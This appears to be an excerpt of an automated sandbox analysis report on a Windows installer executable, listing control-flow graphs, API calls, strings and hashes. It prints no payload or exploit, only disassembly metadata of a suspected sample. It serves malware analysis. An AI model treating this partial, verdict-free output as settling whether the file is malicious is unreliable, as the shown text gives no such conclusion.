              • Opcode Fuzzy Hash: 605fd81be1f41f38ce9b100556876732106d54cf1fc53f7772c9c8b4b7d1963f
              • Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 750 40658f-4065a3 FindFirstFileW 751 4065b0 750->751 752 4065a5-4065ae FindClose 750->752 753 4065b2-4065b3 751->753 752->753
              APIs
              • FindFirstFileW.KERNELBASE(?,00426738,C:\,00405C6E,C:\,C:\,00000000,C:\,C:\,?,?,75923420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 0040659A
              • FindClose.KERNELBASE(00000000), ref: 004065A6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Find$CloseFileFirst
              • String ID: 8gB$C:\
              • API String ID: 2295610775-735758550
              • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
              • Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
              • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
              • Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
              • Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
              • Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
              • Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 188 403d08-403d1a 189 403d20-403d26 188->189 190 403e5b-403e6a 188->190 189->190 193 403d2c-403d35 189->193 191 403eb9-403ece 190->191 192 403e6c-403eb4 GetDlgItem * 2 call 4041e1 SetClassLongW call 40140b 190->192 197 403ed0-403ed3 191->197 198 403f0e-403f13 call 40422d 191->198 192->191 194 403d37-403d44 SetWindowPos 193->194 195 403d4a-403d4d 193->195 194->195 199 403d67-403d6d 195->199 200 403d4f-403d61 ShowWindow 195->200 202 403ed5-403ee0 call 401389 197->202 203 403f06-403f08 197->203 210 403f18-403f33 198->210 205 403d89-403d8c 199->205 206 403d6f-403d84 DestroyWindow 199->206 200->199 202->203 225 403ee2-403f01 SendMessageW 202->225 203->198 209 4041ae 203->209 216 403d8e-403d9a SetWindowLongW 205->216 217 403d9f-403da5 205->217 213 40418b-404191 206->213 215 4041b0-4041b7 209->215 211 403f35-403f37 call 40140b 210->211 212 403f3c-403f42 210->212 211->212 221 403f48-403f53 212->221 222 40416c-404185 DestroyWindow KiUserCallbackDispatcher 212->222 213->209 220 404193-404199 213->220 216->215 223 403e48-403e56 call 404248 217->223 224 403dab-403dbc GetDlgItem 217->224 220->209 226 40419b-4041a4 ShowWindow 220->226 221->222 227 403f59-403fa6 call 40626e call 4041e1 * 3 GetDlgItem 221->227 222->213 223->215 228 403ddb-403dde 224->228 229 403dbe-403dd5 SendMessageW IsWindowEnabled 224->229 225->215 226->209 258 403fb0-403fec ShowWindow KiUserCallbackDispatcher call 404203 EnableWindow 227->258 259 403fa8-403fad 227->259 232 403de0-403de1 228->232 233 403de3-403de6 228->233 229->209 229->228 236 403e11-403e16 call 4041ba 232->236 237 403df4-403df9 233->237 238 403de8-403dee 233->238 236->223 239 403dfb-403e01 237->239 240 403e2f-403e42 SendMessageW 237->240 238->240 243 403df0-403df2 238->243 244 403e03-403e09 call 40140b 239->244 245 403e18-403e21 call 40140b 239->245 240->223 243->236 254 403e0f 244->254 245->223 255 403e23-403e2d 245->255 254->236 255->254 262 403ff1 258->262 263 403fee-403fef 258->263 259->258 264 403ff3-404021 GetSystemMenu EnableMenuItem SendMessageW 262->264 263->264 265 404023-404034 SendMessageW 264->265 266 404036 264->266 267 40403c-40407b call 404216 call 403ce9 call 40624c lstrlenW call 40626e SetWindowTextW call 401389 265->267 266->267 267->210 278 404081-404083 267->278 278->210 279 404089-40408d 278->279 280 4040ac-4040c0 DestroyWindow 279->280 281 40408f-404095 279->281 280->213 283 4040c6-4040f3 CreateDialogParamW 280->283 281->209 282 40409b-4040a1 281->282 282->210 284 4040a7 282->284 283->213 285 4040f9-404150 call 4041e1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 283->285 284->209 285->209 290 404152-404165 ShowWindow call 40422d 285->290 292 40416a 290->292 292->213
              APIs
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
              • ShowWindow.USER32(?), ref: 00403D61
              • DestroyWindow.USER32 ref: 00403D75
              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D91
              • GetDlgItem.USER32(?,?), ref: 00403DB2
              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
              • IsWindowEnabled.USER32(00000000), ref: 00403DCD
              • GetDlgItem.USER32(?,00000001), ref: 00403E7B
              • GetDlgItem.USER32(?,00000002), ref: 00403E85
              • SetClassLongW.USER32(?,000000F2,?), ref: 00403E9F
              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
              • GetDlgItem.USER32(?,00000003), ref: 00403F96
              • ShowWindow.USER32(00000000,?), ref: 00403FB7
              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FC9
              • EnableWindow.USER32(?,?), ref: 00403FE4
              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FFA
              • EnableMenuItem.USER32(00000000), ref: 00404001
              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
              • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
              • SetWindowTextW.USER32(?,004236E8), ref: 0040406A
              • ShowWindow.USER32(?,0000000A), ref: 0040419E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
              • String ID: Lx$6B
              • API String ID: 3282139019-3681921830
              • Opcode ID: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
              • Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
              • Opcode Fuzzy Hash: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
              • Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 293 40395a-403972 call 406626 296 403974-403984 call 406193 293->296 297 403986-4039bd call 40611a 293->297 306 4039e0-403a09 call 403c30 call 405c25 296->306 302 4039d5-4039db lstrcatW 297->302 303 4039bf-4039d0 call 40611a 297->303 302->306 303->302 311 403a9b-403aa3 call 405c25 306->311 312 403a0f-403a14 306->312 318 403ab1-403ad6 LoadImageW 311->318 319 403aa5-403aac call 40626e 311->319 312->311 314 403a1a-403a42 call 40611a 312->314 314->311 320 403a44-403a48 314->320 322 403b57-403b5f call 40140b 318->322 323 403ad8-403b08 RegisterClassW 318->323 319->318 324 403a5a-403a66 lstrlenW 320->324 325 403a4a-403a57 call 405b4a 320->325 336 403b61-403b64 322->336 337 403b69-403b74 call 403c30 322->337 326 403c26 323->326 327 403b0e-403b52 SystemParametersInfoW CreateWindowExW 323->327 331 403a68-403a76 lstrcmpiW 324->331 332 403a8e-403a96 call 405b1d call 40624c 324->332 325->324 330 403c28-403c2f 326->330 327->322 331->332 335 403a78-403a82 GetFileAttributesW 331->335 332->311 339 403a84-403a86 335->339 340 403a88-403a89 call 405b69 335->340 336->330 346 403b7a-403b94 ShowWindow call 4065b6 337->346 347 403bfd-403bfe call 405383 337->347 339->332 339->340 340->332 352 403ba0-403bb2 GetClassInfoW 346->352 353 403b96-403b9b call 4065b6 346->353 351 403c03-403c05 347->351 354 403c07-403c0d 351->354 355 403c1f-403c21 call 40140b 351->355 358 403bb4-403bc4 GetClassInfoW RegisterClassW 352->358 359 403bca-403bed DialogBoxParamW call 40140b 352->359 353->352 354->336 360 403c13-403c1a call 40140b 354->360 355->326 358->359 364 403bf2-403bfb call 4038aa 359->364 360->336 364->330
              APIs
                • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
              • lstrcatW.KERNEL32(1033,004236E8), ref: 004039DB
              • lstrlenW.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Local\Innoxious,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A5B
              • lstrcmpiW.KERNEL32(?,.exe,Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Local\Innoxious,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
              • GetFileAttributesW.KERNEL32(Remove folder: ), ref: 00403A79
              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Innoxious), ref: 00403AC2
                • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
              • RegisterClassW.USER32(004291A0), ref: 00403AFF
              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B4C
              • ShowWindow.USER32(00000005,00000000), ref: 00403B82
              • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BAE
              • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BBB
              • RegisterClassW.USER32(004291A0), ref: 00403BC4
              • DialogBoxParamW.USER32(?,00000000,00403D08,00000000), ref: 00403BE3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
              • String ID: "C:\Users\user\Desktop\KWOTASIE.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Innoxious$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
              • API String ID: 1975747703-1784403910
              • Opcode ID: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
              • Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
              • Opcode Fuzzy Hash: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
              • Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 367 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d3e 370 402f11-402f16 367->370 371 402f1b-402f49 call 40624c call 405b69 call 40624c GetFileSize 367->371 372 4030f3-4030f7 370->372 379 403036-403044 call 402e5d 371->379 380 402f4f 371->380 386 403046-403049 379->386 387 403099-40309e 379->387 382 402f54-402f6b 380->382 384 402f6d 382->384 385 402f6f-402f78 call 4032df 382->385 384->385 394 4030a0-4030a8 call 402e5d 385->394 395 402f7e-402f85 385->395 389 40304b-403063 call 4032f5 call 4032df 386->389 390 40306d-403097 GlobalAlloc call 4032f5 call 4030fa 386->390 387->372 389->387 418 403065-40306b 389->418 390->387 416 4030aa-4030bb 390->416 394->387 396 403001-403005 395->396 397 402f87-402f9b call 405cf9 395->397 404 403007-40300e call 402e5d 396->404 405 40300f-403015 396->405 397->405 414 402f9d-402fa4 397->414 404->405 407 403024-40302e 405->407 408 403017-403021 call 406719 405->408 407->382 415 403034 407->415 408->407 414->405 420 402fa6-402fad 414->420 415->379 421 4030c3-4030c8 416->421 422 4030bd 416->422 418->387 418->390 420->405 423 402faf-402fb6 420->423 424 4030c9-4030cf 421->424 422->421 423->405 425 402fb8-402fbf 423->425 424->424 426 4030d1-4030ec SetFilePointer call 405cf9 424->426 425->405 427 402fc1-402fe1 425->427 430 4030f1 426->430 427->387 429 402fe7-402feb 427->429 431 402ff3-402ffb 429->431 432 402fed-402ff1 429->432 430->372 431->405 433 402ffd-402fff 431->433 432->415 432->431 433->405
              APIs
              • GetTickCount.KERNEL32 ref: 00402ED2
              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\KWOTASIE.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\KWOTASIE.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KWOTASIE.exe,C:\Users\user\Desktop\KWOTASIE.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: File$AttributesCountCreateModuleNameSizeTick
              • String ID: "C:\Users\user\Desktop\KWOTASIE.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\KWOTASIE.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
              • API String ID: 4283519449-2100042470
              • Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
              • Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
              • Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
              • Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 434 40626e-406279 435 40627b-40628a 434->435 436 40628c-4062a2 434->436 435->436 437 4062a8-4062b5 436->437 438 4064ba-4064c0 436->438 437->438 439 4062bb-4062c2 437->439 440 4064c6-4064d1 438->440 441 4062c7-4062d4 438->441 439->438 443 4064d3-4064d7 call 40624c 440->443 444 4064dc-4064dd 440->444 441->440 442 4062da-4062e6 441->442 445 4064a7 442->445 446 4062ec-40632a 442->446 443->444 450 4064b5-4064b8 445->450 451 4064a9-4064b3 445->451 448 406330-40633b 446->448 449 40644a-40644e 446->449 452 406354 448->452 453 40633d-406342 448->453 454 406450-406456 449->454 455 406481-406485 449->455 450->438 451->438 461 40635b-406362 452->461 453->452 458 406344-406347 453->458 459 406466-406472 call 40624c 454->459 460 406458-406464 call 406193 454->460 456 406494-4064a5 lstrlenW 455->456 457 406487-40648f call 40626e 455->457 456->438 457->456 458->452 463 406349-40634c 458->463 468 406477-40647d 459->468 460->468 465 406364-406366 461->465 466 406367-406369 461->466 463->452 469 40634e-406352 463->469 465->466 471 4063a4-4063a7 466->471 472 40636b-406389 call 40611a 466->472 468->456 474 40647f 468->474 469->461 475 4063b7-4063ba 471->475 476 4063a9-4063b5 GetSystemDirectoryW 471->476 477 40638e-406392 472->477 478 406442-406448 call 4064e0 474->478 480 406425-406427 475->480 481 4063bc-4063ca GetWindowsDirectoryW 475->481 479 406429-40642d 476->479 482 406432-406435 477->482 483 406398-40639f call 40626e 477->483 478->456 479->478 485 40642f 479->485 480->479 484 4063cc-4063d6 480->484 481->480 482->478 488 406437-40643d lstrcatW 482->488 483->479 490 4063f0-406406 SHGetSpecialFolderLocation 484->490 491 4063d8-4063db 484->491 485->482 488->478 494 406421 490->494 495 406408-40641f SHGetPathFromIDListW CoTaskMemFree 490->495 491->490 493 4063dd-4063e4 491->493 496 4063ec-4063ee 493->496 494->480 495->479 495->494 496->479 496->490
              APIs
              • GetSystemDirectoryW.KERNEL32(Remove folder: ,00000400), ref: 004063AF
              • GetWindowsDirectoryW.KERNEL32(Remove folder: ,00000400,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,?,004052E7,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000), ref: 004063C2
              • SHGetSpecialFolderLocation.SHELL32(004052E7,00410EA0,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,?,004052E7,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000), ref: 004063FE
              • SHGetPathFromIDListW.SHELL32(00410EA0,Remove folder: ), ref: 0040640C
              • CoTaskMemFree.OLE32(00410EA0), ref: 00406417
              • lstrcatW.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
              • lstrlenW.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,?,004052E7,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000), ref: 00406495
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
              • String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
              • API String ID: 717251189-2910227427
              • Opcode ID: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
              • Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
              • Opcode Fuzzy Hash: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
              • Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 561 40176f-401794 call 402c37 call 405b94 566 401796-40179c call 40624c 561->566 567 40179e-4017b0 call 40624c call 405b1d lstrcatW 561->567 572 4017b5-4017b6 call 4064e0 566->572 567->572 576 4017bb-4017bf 572->576 577 4017c1-4017cb call 40658f 576->577 578 4017f2-4017f5 576->578 585 4017dd-4017ef 577->585 586 4017cd-4017db CompareFileTime 577->586 579 4017f7-4017f8 call 405d19 578->579 580 4017fd-401819 call 405d3e 578->580 579->580 588 40181b-40181e 580->588 589 40188d-4018b6 call 4052b0 call 4030fa 580->589 585->578 586->585 590 401820-40185e call 40624c * 2 call 40626e call 40624c call 4058ae 588->590 591 40186f-401879 call 4052b0 588->591 601 4018b8-4018bc 589->601 602 4018be-4018ca SetFileTime 589->602 590->576 623 401864-401865 590->623 603 401882-401888 591->603 601->602 605 4018d0-4018db FindCloseChangeNotification 601->605 602->605 606 402ac8 603->606 609 4018e1-4018e4 605->609 610 402abf-402ac2 605->610 611 402aca-402ace 606->611 613 4018e6-4018f7 call 40626e lstrcatW 609->613 614 4018f9-4018fc call 40626e 609->614 610->606 620 401901-4022f6 call 4058ae 613->620 614->620 620->610 620->611 623->603 625 401867-401868 623->625 625->591
              APIs
              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
              • CompareFileTime.KERNEL32(-00000014,?,Unknownness,Unknownness,00000000,00000000,Unknownness,C:\Users\user\AppData\Local\Innoxious\olivilin,?,?,00000031), ref: 004017D5
                • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                • Part of subcall function 004052B0: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                • Part of subcall function 004052B0: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00403233), ref: 0040530B
                • Part of subcall function 004052B0: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\), ref: 0040531D
